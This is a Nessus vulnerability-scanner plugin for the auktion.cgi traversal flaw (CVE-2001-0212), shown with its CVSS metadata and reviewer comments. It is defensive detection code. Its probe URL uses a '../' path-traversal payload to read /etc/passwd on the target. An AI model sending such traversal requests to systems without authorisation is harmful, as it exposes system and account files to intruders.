nessusThis script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.AUKTION_CGI.NASL
HistoryMar 25, 2001 - 12:00 a.m.

HIS AUktion auktion.cgi Traversal Arbitrary Command Execution

2001-03-25 00:00:00
This script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
49

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.534 Medium

EPSS

Percentile

97.6%

The ‘auktion.cgi’ CGI script is installed. This CGI has a well-known security flaw that lets an attacker execute arbitrary commands with the privileges of the HTTP daemon (usually root or nobody).

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

# Metadata section. When the engine loads the plugin with `description` set,
# only the registration calls below run; the closing exit(0) returns before
# any of the detection code further down is reached.
if(description)
{
 # Identifiers that tie this check to external advisories: the plugin's own id,
 # the Bugtraq id and the CVE entry.
 script_id(10638);
 script_bugtraq_id(2367);
 script_version("1.31");
 script_cve_id("CVE-2001-0212");
 
 script_name(english:"HIS AUktion auktion.cgi Traversal Arbitrary Command Execution");
 # NOTE(review): the summary speaks of a presence check on /cgi-bin/auktion.cgi,
 # but the detection code iterates cgi_dirs() and requests a traversal path,
 # so a finding means the file read succeeded, not merely that the CGI exists.
 script_summary(english:"Checks for the presence of /cgi-bin/auktion.cgi");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is running an application that is affected by a
remote command execution vulnerability." );
 script_set_attribute(attribute:"description", value:
"The 'auktion.cgi' cgi is installed. This CGI has a well known security
flaw that lets an attacker execute arbitrary commands with the
privileges of the http daemon (usually root or nobody)." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Feb/64" );
 # No fix is recorded for this finding.
 # NOTE(review): with no patch referenced, remediation presumably falls back to
 # removing the CGI or restricting access to it - confirm with the asset owner.
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time." );
 # Base vector: network reachable, low complexity, no authentication, partial
 # impact on confidentiality, integrity and availability.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # Temporal vector: exploitability unproven, remediation unavailable, report
 # confidence not defined.
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/03/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/02/12");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # Declared as an information-gathering check.
 # NOTE(review): the request it sends does read a file from the target, so
 # confirm this category matches the scan policy's expectations.
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"CGI abuses");
 # Scheduling hints: the listed plugins run first, the check applies to ports
 # registered under Services/www (or port 80), and it is skipped entirely when
 # Settings/disable_cgi_scanning is set.
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("data_protection.inc");

# Probe each CGI directory for auktion.cgi, passing a 'menue' value that uses
# ../ sequences to reach /etc/passwd.
# NOTE(review): the check demonstrates the path-traversal file read only; the
# command execution named in the plugin title is not exercised here, so that
# impact is inferred from the advisory rather than verified.
port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
  probe_url = strcat(dir, "/auktion.cgi?menue=../../../../../../../../../etc/passwd");
  res = http_send_recv3(method:"GET", item:probe_url, port:port, exit_on_fail:1);

  # Status line, headers and body are joined, so the pattern below is evaluated
  # against the whole response and no status code is checked separately.
  response = strcat(res[0], res[1], '\r\n', res[2]);

  # Evidence of a hit: a passwd-style root entry with uid 0 and gid 0 or 1.
  if (!egrep(pattern:".*root:.*:0:[01]:.*", string:response)) continue;

  # Pass the captured output through the data-protection helper before it can
  # be placed in the report (presumably masks the passwd contents - confirm
  # against data_protection.inc).
  response = data_protection::redact_etc_passwd(output:response);

  report = '\nThe following URL exhibits the flaw :\n' + build_url(port:port, qs:probe_url) + '\n';

  # The (redacted) response is attached only at higher report verbosity.
  if (report_verbosity > 1)
    report = report + '\nIt produced the following output :\n' + response + '\n';

  security_hole(port:port, extra:report);

  # Stop at the first directory that matches; later directories are not probed.
  exit(0);
}
